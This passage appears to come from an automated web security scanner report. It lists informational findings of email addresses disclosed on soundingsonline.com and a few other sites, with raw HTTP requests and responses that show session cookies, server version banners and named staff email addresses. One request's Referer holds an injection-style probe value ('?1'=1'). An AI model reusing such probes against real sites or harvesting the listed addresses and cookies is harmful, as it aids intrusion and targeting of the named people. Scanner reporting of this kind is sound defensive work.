Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:c.brayfield@soundingspub.com">c.brayfield@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.422. http://www.soundingsonline.com/news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /news HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.423. http://www.soundingsonline.com/news/coastwise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /news/coastwise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.424. http://www.soundingsonline.com/news/dispatches

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /news/dispatches HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.425. http://www.soundingsonline.com/news/home-waters

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /news/home-waters HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.426. http://www.soundingsonline.com/news/mishaps-a-rescues

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /news/mishaps-a-rescues HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:27:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:27:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.427. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; __utmc=1; __utmb=1.1.10.1295961240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D2; s_invisit=true; s_lv=1295961240451; s_lv_s=Less%20than%201%20day; s_sq=%5B%5BB%5D%5D; count=5

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 13:16:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 13:16:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.428. http://www.soundingsonline.com/news/sailing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /news/sailing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.429. http://www.soundingsonline.com/news/todays-top-stories

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /news/todays-top-stories HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.430. http://www.soundingsonline.com/resources

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /resources HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.431. http://www.soundingsonline.com/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /s_code.js

Issue detail

The following email address was disclosed in the response:
  • kevin.rogers@dominionenterprises.com

Request

GET /s_code.js HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Content-Length: 33956
Content-Type: application/x-javascript
Last-Modified: Fri, 22 Jan 2010 21:42:50 GMT
Accept-Ranges: bytes
ETag: "d4e125d8ab9bca1:2b06"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:23:53 GMT
Connection: close

/***********************************************/
/*
SiteCatalyst code version: H.21.
Created by Kevin Rogers
kevin.rogers@dominionenterprises.com
01.25.2010
*/
/***********************************************/

var s_account="desoundings"
var s=s_gi(s_account)
/************************** CONFIG SECTION **************************/
/* You may add
...[SNIP]...

24.432. http://www.soundingsonline.com/site-map

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /site-map HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.433. http://www.soundingsonline.com/subscription-services

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /subscription-services HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.434. http://www.soundingsonline.com/subscription-services/preview-current-issue

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /subscription-services/preview-current-issue HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.435. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/subscribe-to-e-newsletter

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /subscription-services/subscribe-to-e-newsletter HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.436. http://www.speech.cs.cmu.edu/~sburke/pub/luhn_lib.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.speech.cs.cmu.edu
Path:   /~sburke/pub/luhn_lib.html

Issue detail

The following email address was disclosed in the response:
  • bfrisch@cs.cmu.edu

Request

GET /~sburke/pub/luhn_lib.html HTTP/1.1
Host: www.speech.cs.cmu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:37:07 GMT
Server: Apache/2
Location: http://interglacial.com/~sburke/pub/luhn_lib.html
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://interglacial.com/~sburke/pub/luhn_lib.ht
...[SNIP]...
<a href="mailto:bfrisch@cs.cmu.edu">
...[SNIP]...

24.437. http://www.thefeast.com/boston/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/

Issue detail

The following email address was disclosed in the response:
  • boston@thefeast.com

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:22:48 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:31 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 280280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://o
